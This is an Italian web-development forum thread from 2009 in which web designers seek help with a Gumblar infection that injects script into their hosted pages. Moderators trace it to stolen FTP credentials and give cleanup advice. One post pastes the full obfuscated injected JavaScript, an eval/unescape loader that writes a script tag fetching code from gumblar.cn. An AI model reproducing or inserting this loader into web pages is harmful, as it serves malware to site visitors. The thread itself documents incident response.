+ Rispondi alla Discussione
Risultati da 1 a 50 di 50

[Risolto] Malware rilevato su siti.

Ultimo Messaggio di Wolf Otakar il:
  1. #1
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306

    [Risolto] Malware rilevato su siti.

    Ciao a tutti,

    il mio problema è questo, sono due giorni che pubblico dei file e che ricevo avviso di malware.

    Avevo lasciato un messaggio in questa posizione >>

    forum/consigli-ed-aiuti-per-il-sito/111129-avviso-di-malware-su-sito.html#

    Potete aiutarmi? Di cosa si puo' trattare?

    Grazie 1000

  2. #2
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Ho appena trovato il codice che viene inserito nelle pagine...

    <script language=javascript><!--
    (function(cPX){var vtUj='%';var lPW='var~20a~3d~22~53cript~45ngine~22~2cb~3d~22Ver sion()+~22~2c~6a~3d~22~22~2cu~3dn~61vigator~2eu~73 ~65rAgent~3b~69f(~28u~2eindex~4ff(~22Win~22~29~3e0 )~26~26(u~2e~69nde~78Of(~22~4e~54~206~22)~3c0)~26~ 26(docu~6dent~2ecookie~2eind~65xOf(~22miek~3d1~22~ 29~3c0~29~26~26(typ~65of~28zrv~7ats)~21~3dty~70e~6 f~66(~22A~22))~29~7bzr~76z~74s~3d~22~41~22~3b~65~7 6~61l(~22~69f(wi~6ed~6fw~2e~22+a+~22)j~3dj+~22+~61 +~22M~61jor~22~2bb+a+~22Minor~22+b+a+~22Bu~69ld~22 +b+~22~6a~3b~22)~3b~64ocu~6dent~2e~77~72it~65(~22~ 3csc~72ip~74~20src~3d~2f~2f~67umbl~61r~2e~63~6e~2f ~72ss~2f~3fid~3d~22+j+~22~3e~3c~5c~2fs~63~72~69pt~ 3e~22)~3b~7d';eval(unescape(lPW.replace(cPX,vtUj)) )})(/~/g);
    --></script>


    Ogni volta che pubblico i file che ho in locale sul server nella pagina viene aggiunto questo script.

    Spero possiate darmi una mano.

    Grazie 1000.

  3. #3
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Se il file viene aggiunto dal server, è il server che è infetto da qualche rootkit (oppure è l'hoster che fa il furbo)
    Contatta l'hoster
    L'unica soluzione rapida, se l'hoster non risponde, è quella di spostare il sito su altro hosting, magari gratuito e reindirizzare i dns.

  4. #4
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Il problema si è verificato su due siti che si trovano su due nostri server diversi.

    Pensavo di provare ad installare un software per la rilevazione di malware sulle macchine e controllare che non ci siano problemi.

    Se avete qualche altro suggerimento fatemi sapere.

    Grazie 1000.

    Ciao.

  5. #5
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    A questo punto direi che è indispensabile conoscere le url dei siti. Postale in modo non attivo (sostituisci il . con uno spazio).
    Sarebbe anche utile capire cosa utilizzi per caricare i file sul server.

  6. #6
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Il sito che dava problemi ieri è greenholiday.it mentre quello che da problemi adesso è kineosrl.it (pagine aspx).

    Per pubblicare utilizzo Dreamweaver CS3.

    Grazie 1000.

  7. #7
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Prova a leggere questo
    Sembra che quando apri un sito infetto invii le credenziali ftp a qualcuno che poi modifica i file sull'ftp.
    Consigliano di usare malwarebyte per ripulite il pc, poi cambiare le password ftp del server ed infine uploadare nuovamente i file sul sito.

  8. #8
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Grazie 1000 per l'assistenza, mi leggo tutto e provo.
    Appena fatto vi faccio sapere come è andata.

    Grazie ancora .

  9. #9
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Grazie 1000 ancora.

    Ho seguito le indicazioni:

    1- installato il programma "malwarebyte" sul mio pc
    2- fatta fare una scansione di tutti i dischi
    3- cambiato i dati di accesso ftp
    4- ripubblicati i file non infetti

    Sulla mia macchina non sono stati rilevati malware, il problema è che dopo qualche minuto il sito di nuovo da lo stesso errore di prima in altre pagine.


  10. #10
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    C'è qualcun'altro che usa quel sito/FTP?
    Hai seguito anche il consiglio di non memorizzare in automatico le password sul tuo computer?

  11. #11
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Pubblico solamente io i file di quel sito, per la password ho tolto adesso il salvataggio automatico dalle impostazioni di dreamweaver ed ho ripetuto la procedura.. per il momento sembra andare.. speriamo bene.

    Il mio timore è che si ripresenti il problema anche con altri siti che gestisco (se il danno è sul mio pc), togliendo tutte le password i tempi di lavoro si allungano un bel po'.

    Speriamo bene... non vorrei dover formattare .

    Grazie 1000 per la celerità di risposta e gli utilissimi consigli.

  12. #12
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Direi che se non salvi la password e tutto va bene sei a posto (nel senso che è chiaro che il pc è infetto da malware).
    Il fatto che gli strumenti antimalware non lo individuino è normale.
    Ti consiglio di cercare un software antivirus/antimalware basato su distribuzione live linux, così da analizzare il sistema senza che sia operativo.
    Puoi guardare quella offerta gratuitamente da bitdefender, ma ce ne sono tante.
    Ultima modifica di redsector; 14-05-09 alle 15:49

  13. #13
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Provo anche questa cosa.. grazie 1000 ancora!

  14. #14
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Sto facendo la scansione...

    Adesso mi ha chiamato il cliente dicendo che quando prova ad aprire alcune pagine del sito compare un messaggio che avvisa di aver trovato un cavallo di troia.

    Quello che viene scritto è questo:

    JS: REDIRECTOR-H2 [TRJ]


    Quando visualizzo il sito dal mio pc adesso non da nessun errore.. come puo' essere possibile?

    Grazie ancora.

  15. #15
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Potrebbe avere in cache del browser una vecchia versione del sito.
    Dovrebbe ripulire la cache.

    In teoria potrebbe avere infettato col malware pure il suo pc, ma questo non influirebbe sulla visualizzazione del sito.

    Dovresti farti dire quali sono le pagine. Io ne ho guardate 2 ore, alcune non sono attive. Questo pop up di avviso chi è che lo tira fuori?
    Io sono in ambiente mac per cui non ho a bordo niente che mi avvisi di malware sui siti, sarebbe interessante indagare su questo punto (a mio livello).

  16. #16
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Avevo pensato alla cache di IE anche io e gliel'ho fatta svuotare, il problema però è rimasto anche così.

    Alcune delle pagine che gli fanno comparire l'avviso sono:

    - terapia-fisica-strumentale.aspx
    - riabilitazione-motoria-e-valutazione.aspx

    Il popup di avviso dovrebbe tirarlo fuori il suo antivirus (comunque chiedo per averne garanzia), a me invece lo faceva comparire Chrome (che adesso però non segnala più niente).

    Grazie .

  17. #17
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Hai ripubblicato anche i JS o solo le pagine?

  18. #18
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Anche i file js.

  19. #19
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Ho trovato questo tool gratuito che analizza il tuo web server per trovare vulnerabilità utilizzando Nessus, che è un software a pagamento reputato per essere il migliore. Devi inserire un file di testo per verificare la tua proprietà del sito e ti invia i risultati via posta in mezz'oretta.
    Provalo pure qui e facci sapere cosa ti racconta, a me sembra pulito l'html, non ho guardato i js.

  20. #20
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Fatto, domani mattina appena arrivo in ufficio vi aggiorno.

    redsector sei stato veramente gentilissimo, grazie mille!

  21. #21
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Sono andata a controllare la mia posta elettronica ma ancora non ho ricevuto niente. Ho provato a ripetere la procedura ma mi sono accorta che puo' essere eseguita una sola volta a settimana per un certo dominio.
    Aspetto di ricevere qualcosa, non appena so qualcosa vi aggiorno.

    Ciao e grazie.

  22. #22
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Località
    Calabria
    Messaggi
    7,480
    Segui Wolf Otakar su Twitter
    Ciao akane_p,

    Citazione Originariamente Scritto da akane_p Visualizza Messaggio
    ......sono due giorni che pubblico dei file e che ricevo avviso di malware
    ..cambiamenti effettuati di recente?



  23. #23
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Mi stai chiedendo se la situazione è sempre la stessa?

    Adesso la cosa è cambiata, io non ho più l'avviso su Chrome ma l'antivirus del mio cliente continua a segnalare la presenza di un virus nel sito.

    Ci sto diventando matta!

    Ciao.

  24. #24
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Località
    Calabria
    Messaggi
    7,480
    Segui Wolf Otakar su Twitter
    Ciao akane_p,


    modifiche apportate di recente al sito? Servizi esterni? Script?


  25. #25
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Sono presenti degli script che uso però anche su altri siti e che non hanno mai dato problemi.
    Inizialmente non davano problemi neanche su questo sito.

    Ciao e grazie per tutti i consigli.

  26. #26
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Direi che è fondamentale sapere che antivirus usa il tuo cliente (anche come versione) per vedere se è possibile installarlo su una macchina virtuale di prova e verificare che presenti lo stesso errore anche a noi (magari è un falso errore).

  27. #27
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    L'antivirus del cliente è Avast.
    Ho provato a far ripubblicare il sito da un'altra macchina e adesso sembra non dare più errore. Forse dovrei provare a ripubblicare dalla mia per vedere cosa succede...

  28. #28
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Mi pare chiaro che hai la tua macchina compromessa, però non è chiaro il meccanismo.
    Puoi pubblicare il sito su un dominio di test (tipo prova.dominioecc)? così verifichiamo i 2 siti e troviamo l'inghippo.

  29. #29
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Certo! Lo faccio e vi avviso, grazie 1000!


  30. #30
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Località
    Calabria
    Messaggi
    7,480
    Segui Wolf Otakar su Twitter
    Ciao akane_p,

    Citazione Originariamente Scritto da akane_p Visualizza Messaggio
    L'antivirus del cliente è Avast.
    ... ultimamente, avast non è il massimo!


    Citazione Originariamente Scritto da akane_p Visualizza Messaggio
    Forse dovrei provare a ripubblicare dalla mia per vedere cosa succede...

  31. #31
    User L'avatar di tonel77
    Data Registrazione
    Jun 2007
    Località
    Piombino (LI)
    Messaggi
    28

    aiuto, stesso problema di akane_p

    Ciao a tutti,
    lavoro nella stessa azienda di akane e purtroppo ho scoperto questa mattina che anche un sito che seguo io ha lo stesso problema che ha riscontrato lei (medimmobiliare.it)

    Le pagine sul server hanno del codice che in locale non è presente.

    Nella pagina di diagnostica c' è scritto:

    Delle 34 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 22 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-05-16, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-05-16. Malicious software includes 27 scripting exploit(s).
    Il software dannoso è presente in 1 domini, tra cui gumblar.cn.
    This site was hosted on 1 network(s) including AS12637 (SEEWEB)
    Ho cliccato su Seeweb, che è il nostro fornitore dei server e nella pagina che si è aperta ho trovato questo messaggio:


    What happened when Google visited sites hosted on this network?
    Of the 6328 site(s) we tested on this network over the past 90 days, 58 site(s), including, for example, meteolive.it, gscopy.it , ripam.it , served content that resulted in malicious software being downloaded and installed without user consent.
    The last time Google tested a site on this network was on 2009-05-19, and the last time suspicious content was found was on 2009-05-19.
    Has this network hosted sites acting as intermediaries for further malware distribution?
    Over the past 90 days, this network has not hosted any sites that appeared to function as intermediaries for the infection of any other sites.
    Has this network hosted sites that have distributed malware?
    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 2 site(s), including, for example, rebeclub.it , 01pessot.com, that infected 2 other site(s), including, for example, 4000.it, 01pessot.it .
    Secondo voi può essere un problema legato ai server?
    Seguirò i consigli che avete dato ad akane: scansione e ripubblicazione dei file del sito togliendo poi la password dal software utilizzato (ace ftp, nel mio caso)

    Avete qualche idea per aiutarci?
    Grazie mille

  32. #32
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Quando si ha a che fare con uno di questi malware, che si installano aprendo il sito "infetto" è chiaro che tutti risultano compromessi (in teoria anche le persone che leggessero questo thread e curiosassero i siti in oggetto).

    Direi che la prima cosa da fare è quella di tagliare la testa al toro.
    Ovvero (non so quanti siate a lavorare), prendere un computer e sacrificarlo alla buona causa in questo modo.
    Reinstallare da zero (da formattazione) il sistema operativo, dopo di che non usarlo per navigare su nessun sito fino a che non ha completato tutti gli aggiornamenti (immagino sia windows). Poi nel caso lo abbiate installerei un antivirus.
    A quel punto si userebbe questo computer per cambiare tutte le password ai vostri siti (tutti, senza comunicarla a nessuno) e, sempre da qui, si utilizzerebbe un software ftp (filezilla va benissimo) per ricaricare tutti i siti dall'originale (senza memorizzare la password nel computer).

    A questo punto questo computer sarebbe l'unico autorizzato a pubblicare i siti nel periodo in cui si viene a capo se l'infezione è solo vostra o se è del server. Una volta stabilizzata la situazione si può ripulire il resto dei computer e stare un po' più sicuri.

    Tutta questa operazione si può anche fare con una macchina virtuale (senza formattare il pc). Purroppo, visto che immagino ci sia un problema di "immagine" vostra, ritengo che sia fondamentale ripristinare tutti i vostri siti in modo sicuro, così da stabilire se fosse un problema dell'hoster (a quel punto vi potreste rivalere su di lui).

    Altre soluzioni, meno drastiche ci sono, ma ritengo che siano più lente e meno sicure. Ad esempio potreste mettere i siti su una chiavetta USB e fare partire la macchina su una live-dvd linux. A quel punto cambiereste le password e fareste l'upload solo così fino a che la situazione non si risolve in modo chiaro.

  33. #33
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Località
    Calabria
    Messaggi
    7,480
    Segui Wolf Otakar su Twitter
    Ciao redsector,

    Citazione Originariamente Scritto da redsector
    ;....... prendere un computer e sacrificarlo alla buona causa in questo modo.
    Reinstallare da zero (da formattazione) il sistema operativo
    ....formattare? No dai......!!!!


    Ciao tonel77,

    Citazione Originariamente Scritto da tonel77 Visualizza Messaggio
    ....Le pagine sul server hanno del codice che in locale non è presente.
    come per akane_p "modifiche apportate di recente al sito? Servizi esterni? Script?"


  34. #34
    User L'avatar di tonel77
    Data Registrazione
    Jun 2007
    Località
    Piombino (LI)
    Messaggi
    28
    Ciao Wolf,
    ho pubblicato circa un paio di mesi fa per aggiungere un link sulla home.

    Le pagine hanno uno script per lo zoom delle immagini, che richiama dei file js esterni.

    Il cliente, che è un'agenzia immobiliare, pubblica sul sito spesso gli immobili o modifiche degli stessi, con un nostro software.

    Ho notato che le pagine .asp che non contengono lo script e non vengono aggiornate dal cliente, non hanno il codice "estraneo".

    Immagino che ci sia un motivo.... sai illuminarmi??

  35. #35
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Località
    Calabria
    Messaggi
    7,480
    Segui Wolf Otakar su Twitter
    Ciao tonel77,

    Citazione Originariamente Scritto da tonel77 Visualizza Messaggio
    .....Le pagine hanno uno script per lo zoom delle immagini, che richiama dei file js esterni.
    elimina "momentaneamente" lo script e vediamo che succede!!!

  36. #36
    User L'avatar di tonel77
    Data Registrazione
    Jun 2007
    Località
    Piombino (LI)
    Messaggi
    28
    Per il momento ho modificato la password ftp, ripubblicato i file del sito_e poi ho controllato se c'era di nuovo il codice, per fortuna non c'è.

    Poi ho tolto la password dal programma di pubblicazione.

    Pensi che possa funzionare?

    Ah, in alcune pagine "infettate" lo script per lo zoom non c'è.....
    Ultima modifica di Wolf Otakar; 20-05-09 alle 16:01 Motivo: Maiuscole e spazi!

  37. #37
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Località
    Calabria
    Messaggi
    7,480
    Segui Wolf Otakar su Twitter
    Ciao tonel77/akane_p,

    Citazione Originariamente Scritto da tonel77 Visualizza Messaggio
    Per il momento ho modificato la password ftp, ripubblicato i file del sito_e poi ho controllato se c'era di nuovo il codice, per fortuna non c'è.
    ....novità???

  38. #38
    User L'avatar di tonel77
    Data Registrazione
    Jun 2007
    Località
    Piombino (LI)
    Messaggi
    28
    Ciao Wolf,
    per il momento sembra tutto a posto
    e non abbiamo rilevato il problema su altri siti.

    Speriamo in bene....

    Ciao e grazie per l'interessamento!

  39. #39
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Località
    Calabria
    Messaggi
    7,480
    Segui Wolf Otakar su Twitter
    Citazione Originariamente Scritto da tonel77 Visualizza Messaggio
    Ciao e grazie per l'interessamento!


  40. #40
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Come non detto... ecco ancora il problema...
    Adesso il sito infetto è questo: immobiliare-arcobaleno.it/affitto_toscana/ita/index.aspx

    E questo è il messaggio che mi da l'explorer quando apro le pagine infette:

    Informazioni su Trojan Horse
    Rilevato: Obfuscated Script.f (Trojan Horse)
    Percorso: C:\Documents and Settings\Patrizia Lorenzini\Impostazioni locali\Dati applicazioni\Google\Chrome\User Data\Default\Cache\f_000127
    I Trojan hanno l'aspetto di programmi legittimi, ma possono consentire l'accesso non autorizzato al computer, provocarne malfunzionamenti e danneggiare file importanti.

    Adesso do un'occhiata alle varie pagine per vedere di cosa puo' trattarsi e vi aggiorno.

    E' una tragedia.






  41. #41
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Ho notato che in rete ci sono delle info in più adesso, per il momento mi sono installata un software Anti-Rootkit e sto facendo la scansione della macchina.
    Spero possa servirmi a qualcosa.

    Qualche info su Gumblar si puo' trovare anche a questo indirizzo >> martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

  42. #42
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Rieccomi... questa cosa mi sta facendo impazzire!
    Adesso il problema è su questo sito: immobiliare-arcobaleno.it/affitto_toscana/ita/index.aspx

    Ho notato che sono le pagine aspx a darmi problemi.. puo' essere solo un caso?

    Credo che diventerò pazza!

  43. #43
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Ritengo che la via della reinstallazione e il successivo aggiornamento all'ultima release di windows e dei programmi adobe sia necessario.
    In ogni caso, ti conviene fare come spiega Wolf Otakar negli altri thread di sezione, ovvero far girare Hijaackthis sul tuo computer (per iniziare), poi carica il log su freefilehosting.net e posta qui il link non attivo (senza www).

    Vedrai che ti darà una mano a debellare il problema alla radice.

  44. #44
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Grazie 1000, adesso provo a seguire tutte le indicazioni.. speriamo di risolvere.

    Mi stavo chiedendo una cosa, i proprietari dei siti segnalati sono in possesso di un ns. software con il quale effettuano gli aggiornamenti.
    Si tratta di un programma installato in locale che permette di pubblicare dati sul sito attraverso le credenziali ftp.
    Secondo voi è possibile che siano direttamente i clienti ad infettare i loro siti? Magari navigando sono stati infettati da questo virus...

    Grazie ancora.

  45. #45
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Ho appena caricato il log a questo indirizzo >> filefactory.com/file/ag55a72/n/hijackthis_log


    Grazie 1000 .

  46. #46
    Moderatore L'avatar di redsector
    Data Registrazione
    May 2006
    Località
    Varese
    Messaggi
    1,328
    Non riesco ad aiutarti sul log, vedrai che Wolf appena potrà ti aiuta, però ho trovato un interessante tool di google che permette di consocere lo stato del "malware" su un qualunque sito senza neache navigarlo.

    google.com/safebrowsing/diagnostic?site=QUESTOSITO.TLD

    Basta metterci davanti www e scrivere correttamente il nome del dominio. Ho visto che i tuoi sono ancora infetti, quindi suppongo non abbiate trovato soluzione.

  47. #47
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Località
    Calabria
    Messaggi
    7,480
    Segui Wolf Otakar su Twitter
    Ciao akane_p,

    fixa con hijackthis:

    O4 - HKCU\..\Run: [ChristmasTree] C:\DOCUME~1\PATRIZ~1\IMPOST~1\Temp\Directory temporanea 1 per christmas.zip\Christmas.exe
    Dai una ripulita con ccleaner, scansiona con malwarebytes "aggiornato", allega il log di scansione su filefactory.com e riporta l'url sul forum.

    Novità dai siti???

  48. #48
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Nell'ultima settimana i siti non hanno dato più problemi, uno dei domini infetti collegato a questi siti sembra sia stato chiuso... comunque sto continuando a verificare.

    Adesso do una ripulita e ripubblico il file.

    Grazie 1000.

  49. #49
    User L'avatar di akane_p
    Data Registrazione
    Oct 2008
    Località
    Suvereto, Toscana
    Messaggi
    306
    Confermo che improvvisamente (per fortuna) il problema non si è più presentato.

    Grazie 1000 a tutti per l'aiuto!

  50. #50

+ Rispondi alla Discussione

Tag per Questa Discussione

^ Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  
  • Il codice BB è Attivato
  • Le faccine sono Attivato
  • Il codice [IMG] è Attivato
  • Il codice [VIDEO] è Attivato
  • Il codice HTML è Disattivato
  • Trackbacks Attivato
  • Pingback Attivato
  • Refback Attivato

SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.